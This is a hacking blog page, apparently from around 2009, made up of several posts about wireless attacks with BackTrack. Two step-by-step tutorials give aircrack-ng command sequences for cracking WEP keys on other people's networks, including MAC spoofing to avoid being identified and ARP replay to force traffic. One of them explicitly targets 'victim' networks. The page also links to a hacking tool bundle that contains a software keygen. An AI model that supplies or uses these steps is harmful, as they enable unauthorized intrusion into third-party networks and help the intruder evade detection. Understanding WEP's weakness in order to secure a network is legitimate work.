Special Security

Showing posts with label back|track. Show all posts

The Best Collection Wifi Hacking Tools | 170 MB

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0KdskkOEoqt6BWIDpaxOqMyxlejyMuOBbC2BGr8sHCajGUWZeRLYAxPq_1GRG0Ckxo3mzol6d735y5rslVxr2w1noZjvIcuu9AMBs4Ms2wwNJflo_4eMbiU98gGRwOZ0Evrcqv284_cgr/s1600/WiFi_AIO_2010.jpg

~ - WiFi Hack AIO 2010 All In One | 170 MB - ~

~ Key Features ~
• WirelessKeyView
• Wifi Monster
• NetStumbler
• Easy Wifi Radar
• SmartSniff
• Ettercap
• WinPcap
• CommView

~ Windows Tools 2 ~
• Nmap
• Wirelessmon
• PocketWarrior
• Inssider
• RemoteAnyWhere
• PmoniPacketMon
• ApTools
• WiFiFoFum
• Advanced Port Scanner
• NetSurveyor

~ Backtrack ~
• Enlace de descarga para BackTrack 4 Pre Release
• Enlace de descarga para BackTrack 4 Beta Release
• Enlace de descarga para BackTrack 3 VmWare Image
• Enlace de descarga para BackTrack 3
• Enlace de descarga para BackTrack 3 USB Version

~ PDF’s & Tutorials ~
• Hacking Wireless Networks
• Cracking WEP and WPA WiFi
• Wifi Hacking
• Hacking Asus WL520gU
• BackTrack PDFs
• WiFi Advanced Fuzzing
• Wifi Security
• Wireless Sniffing WiresHark
• Wireless Hacking Tools

~ Bonus Software ~
• Net Tools
• WepGen
• Cantennator
• Anchorfree
• Cain and Abel
• Wifi Drivers
• Brutus
• VmWare Keygen
• LanHelper

~~Download

Installing VMWare Workstation 6.5.2 On BackTrack 4

~ Posted by Joe2010 | Tagged with back|track , Tutorials Security [EN] | Leave a Comment

As usual, brand new kernel woes with VMware. Here’s a quick way to patch up VMware 6.5.2 to get the modules to compile. Start by downloading and installing VMWare Workstation 6.5.2.

http://www.offensive-security.com/blog/wp-content/uploads/2009/06/vmware-workstation1.png

Once that’s done, run the following commands:

rmmod kvm_intel kvm
echo blacklist kvm >> /etc/modprobe.d/blacklist
cd /tmp
wget www.offensive-security.com/tools/bt4-vmware-workstation-patch.tar.bz2
tar jxpf bt4-vmware-workstation-patch.tar.bz2
chmod 755 vmware-6.5.2-modules-2.6.29-fix*
./vmware-6.5.2-modules-2.6.29-fix.sh
vmware-modconfig –console –install-all
vmware

Done!

Source: Offensive Security

Basic Entry into a WEP Encrypted Network

~ Posted by Joe2010 | Tagged with back|track , Wifi-Wireless H4ckîng | 4 Comments

Basic Entry into a WEP Encrypted Network

**DISCLAIMER**

- I know that many people have thrown up various tutorials before about hacking wep with Backtrack 3 but I never felt that they fully explained everything very well for noobs. (at least not the ones I read) This is in no way meant to attack someone else that has posted a tut on this before...I simply wanted to put one up that was very easy to follow even if you had never done anything like this before. Since this explains EVERYTHING in detail, it is quite long. Enjoy-

1. Getting the right tools

Download Backtrack 3. It can be found here:

http://www.remote-exploit.org/backtrack_download.html

The Backtrack 4 beta is out but until it is fully tested (especially if you are a noob) I would get the BT3 setup. The rest of this guide will proceed assuming you downloaded BT3. I downloaded the CD iso and burned it to a cd. Insert your BT3 cd/usb drive and reboot your computer into BT3. I always load into the 3rd boot option from the boot menu. (VESA/KDE) You only have a few seconds before it auto-boots into the 1st option so be ready. The 1st option boots too slowly or not at all so always boot from the 2nd or 3rd. Experiment to see what works best for you.

2. Preparing the victim network for attack

Once in BT3, click the tiny black box in the lower left corner to load up a "Konsole" window. Now we must prep your wireless card.
Type:

airmon-ng

You will see the name of your wireless card. (mine is named "ath0") From here on out, replace "ath0" with the name of your card.
Now type:

airmon-ng stop ath0

then type:

ifconfig wifi0 down

then:

macchanger --mac 00:11:22:33:44:55 wifi0

then:

airmon-ng start wifi0

What these steps did was to spoof (fake) your mac address so that JUST IN CASE your computers discovered by someone as you are breaking in, they will not see your REAL mac address. Moving on...
Now it's time to discover some networks to break into.

Type:

airodump-ng ath0

Now you will see a list of wireless networks start to populate. Some will have a better signal than others and it is a good idea to pick one that has a decent signal otherwise it will take forever to crack or you may not be able to crack it at all.
Once you see the network that you want to crack, do this:

hold down ctrl and tap c

This will stop airodump from populating networks and will freeze the screen so that you can see the info that you need.

**Now from here on out, when I tell you to type a command, you need to replace whatever is in parenthesis with what I tell you to from your screen. For example: if i say to type:
-c (channel)
then don't actually type in
-c (channel)
Instead, replace that with whatever the channel number is...so, for example you would type:
-c 6
Can't be much clearer than that...lets continue...

Now find the network that you want to crack and MAKE SURE that it says the encryption for that network is WEP. If it says WPA or any variation of WPA then move on...you can still crack WPA with backtrack and some other tools but it is a whole other ball game and you need to master WEP first.

Once you've decided on a network, take note of its channel number and bssid. The bssid will look something like this --> 05:gk:30:fo:s9:2n
The Channel number will be under a heading that says "CH".
Now, in the same Konsole window, type:

airodump-ng -c (channel) -w (file name) --bssid (bssid) ath0

the FILE NAME can be whatever you want. This is simply the place that airodump is going to store the packets of info that you receive to later crack. You don't even put in an extension...just pick a random word that you will remember. I usually make mine "wepkey" because I can always remember it.

**Side Note: if you crack more than one network in the same session, you must have different file names for each one or it won't work. I usually just name them wepkey1, wepkey2, etc.

Once you typed in that last command, the screen of airodump will change and start to show your computer gathering packets. You will also see a heading marked "IV" with a number underneath it. This stands for "Initialization Vector" but in noob terms all this means is "packets of info that contain clues to the password." Once you gain a minimum of 5,000 of these IV's, you can try to crack the password. I've cracked some right at 5,000 and others have taken over 60,000. It just depends on how long and difficult they made the password.

Now you are thinking, "I'm screwed because my IV's are going up really slowly." Well, don't worry, now we are going to trick the router into giving us HUNDREDS of IV's per second.

3. Actually cracking the WEP password

Now leave this Konsole window up and running and open up a 2nd Konsole window. In this one type:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0

This will send some commands to the router that basically cause it to associate with your computer even though you are not officially connected with the password. If this command is successful, you should see about 4 lines of text print out with the last one saying something similar to "Association Successful :-)" If this happens, then good! You are almost there. Now type:

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 ath0

This will generate a bunch of text and then you will see a line where your computer is gathering a bunch of packets and waiting on ARP and ACK. Don't worry about what these mean...just know that these are your meal tickets. Now you just sit and wait. Once your computer finally gathers an ARP request, it will send it back to the router and begin to generate hundreds of ARP and ACK per second. Sometimes this starts to happen within seconds...sometimes you have to wait up to a few minutes. Just be patient. When it finally does happen, switch back to your first Console window and you should see the number underneath the IV starting to rise rapidly. This is great! It means you are almost finished! When this number reaches AT LEAST 5,000 then you can start your password crack. It will probably take more than this but I always start my password cracking at 5,000 just in case they have a really weak password.

Now you need to open up a 3rd and final Konsole window. This will be where we actually crack the password. Type:

aircrack-ng -b (bssid) (filename)-01.cap

Remember the file name you made up earlier? Mine was "wepkey". Don't put a space in between it and -01.cap here. Type it as you see it. So for me, I would type wepkey-01.cap
Once you have done this you will see aircrack fire up and begin to crack the password. typically you have to wait for more like 10,000 to 20,000 IV's before it will crack. If this is the case, aircrack will test what you've got so far and then it will say something like "not enough IV's. Retry at 10,000." DON'T DO ANYTHING! It will stay running...it is just letting you know that it is on pause until more IV's are gathered. Once you pass the 10,000 mark it will automatically fire up again and try to crack it. If this fails it will say "not enough IV's. Retry at 15,000." and so on until it finally gets it.

If you do everything correctly up to this point, before too long you will have the password! now if the password looks goofy, dont worry, it will still work. some passwords are saved in ASCII format, in which case, aircrack will show you exactly what characters they typed in for their password. Sometimes, though, the password is saved in HEX format in which case the computer will show you the HEX encryption of the password. It doesn't matter either way, because you can type in either one and it will connect you to the network.

Take note, though, that the password will always be displayed in aircrack with a colon after every 2 characters. So for instance if the password was "secret", it would be displayed as:
se:cr:et
This would obviously be the ASCII format. If it was a HEX encrypted password that was something like "0FKW9427VF" then it would still display as:
0F:KW:94:27:VF
Just omit the colons from the password, boot back into whatever operating system you use, try to connect to the network and type in the password without the colons and presto! You are in!

It may seem like a lot to deal with if you have never done it, but after a few successful attempts, you will get very quick with it. If I am near a WEP encrypted router with a good signal, I can often crack the password in just a couple of minutes.

I am not responsible for what you do with this information. Any malicious/illegal activity that you do, falls completely on you because...technically...this is just for you to test the security of your own network. :-)

I will gladly answer any legitimate questions anyone has to the best of my ability.
HOWEVER, I WILL NOT ANSWER ANYONE THAT IS TOO LAZY TO READ THE WHOLE TUT AND JUST ASKS ME SOME QUESTION THAT I CLEARLY ANSWERED. No one wants to hold your hand through this...read the tut and go experiment until you get it right.

There are rare occasions where someone will use WEP encryption with SKA as well. (Shared Key Authentication) If this is the case, additional steps are needed to associate with the router and therefore, the steps I lined out here will not work. I've only seen this once or twice, though, so you probably won't run into it. If I get motivated, I may throw up a tut on how to crack this in the future.

Credits to :
Tutori4L by :kumalynx
Picture ; edit Phr4ses By Speci4L Security Te4m

backtrack 4 pre-release

~ Posted by Joe2010 | Tagged with back|track , Security Tools | Leave a Comment

Date: Fri, 19 Jun 2009 23:02:32 -0400
From: Mati Aharoni <muts@offensive-security.com>
Subject: [Full-disclosure] BackTrack 4 Pre Release Available for
Download
To: full-disclosure@lists.grok.org.uk
Message-ID:
<8b0e09fc0906192002o2db466d2hecbbfe127211f89@mail.gmail.com>
Content-Type: text/plain; charset=ISO-8859-1

Dear Everyone,

The Remote Exploit team is ecstatic to announce the availability of
BackTrack 4 Pre Release.

BackTrack 4 has undergone many changes - find more about it here :
http://www.offensive-security.com/backtrack4-guide-tutorial.pdf

You can download backtrack 4 pre final here:
http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso

If you would like to link to BackTrack, please use the remote-exploit
link above.

Check our Pre Release Blog announcement:
http://www.offensive-security.com/blog/backtrack/backtrack-pre-final-public-release-and-download/

May the sauce be with you,

Remote Exploit Team

WiFi Hacking Videos & Tutorials (Back track)

~ Posted by Joe2010 | Tagged with back|track , H4ckîng Tools | Leave a Comment

http://rapidshare.com/files/12889504...c101.part1.rar
http://rapidshare.com/files/12888255...c101.part2.rar
http://rapidshare.com/files/12892459...c101.part3.rar
http://rapidshare.com/files/12901307...c101.part4.rar
http://rapidshare.com/files/12913834...c101.part5.rar
http://rapidshare.com/files/12914845...c101.part6.rar

PASSWORD:
stoneweblog.com

Cracking WEP Using Backtrack 3

~ Posted by Joe2010 | Tagged with back|track | Leave a Comment

Requirements:

* Backtrack 3 on CD or USB
* Computer with compatible 802.11 wireless card
* Wireless Access point or WIFI Router using WEP encryption

I will assume that you have downloaded and booted into Backtrack 3. If you haven’t figured that part out, you probably shouldn’t be trying to crack WEP keys. Once Backtrack is loaded, open a shell and do the following:
Preparing The WIFI Card

First we must enable “Monitor Mode” on the wifi card. If using the Intel® PRO/Wireless 3945ABG chipset issue the following commands:

modprobe -r iwl3945

modprobe ipwraw
The above commands will enable monitor mode on the wireless chipset in your computer. Next we must stop your WIFI card:

iwconfig
Take note of your wireless adapter’s interface name. Then stop the adapter by issuing:

airmon-ng stop [device]
Then:

ifconfig down [interface]
Now we must change the MAC address of the adapter:

macchanger --mac 00:11:22:33:44:66 [device]
Its now time to start the card in monitor mode by doing:

airmon-ng start [device]
airmon-ngstart1.png
Attacking The Target

It is now time to locate a suitable WEP enabled network to work with:

airodump-ng [device]
airodumpwifi0.png

Be sure to note the MAC address (BSSID), channel (CH) and name (ESSID) of the target network. Now we must start collecting data from the WIFI access point for the attack:

airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device]

airodumpoutput.png

The above command will output data collected to the file: network.out. This file will be fed into the WEP Crack program when we are ready to crack the WEP key.

Open another shell and leave the previous command running. Now we need to generate some fake packets to the access point to speed up the data output. Test the access point by issuing the following command:

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]
aireplayfakeauth.png

If this command is successful we will now generate many packets on the target network so that we can crack the KEY. Type:

airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]
aireplaygenerateivs.png

This will force the access point to send out a bunch of packets which we can then use to crack the WEP key. Check your aerodump-ng shell and you should see the “data” section filling up with packets.

captureivs_0.png

After about 10,000-20,000 you can begin cracking the WEP key. If there are no other hosts on the target access point generating packets, you can try:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]
aireplayattack2p.png

Once you have enough packets, you begin the crack:

aircrack-ng -n 128 -b [bssid] [filename]-01.cap

The “-n 128″ signifies a 128-bit WEP key. If cracking fails, try a 64-bit key by changing the value of N to 64.

crackng.png

Once the crack is successful you will be left with the KEY! Remove the : from the output and there is your key. So there you have it.

You can use these techniques to demonstrate to others why using WEP is a bad idea. I suggest you use WPA2 encryption on your wireless networks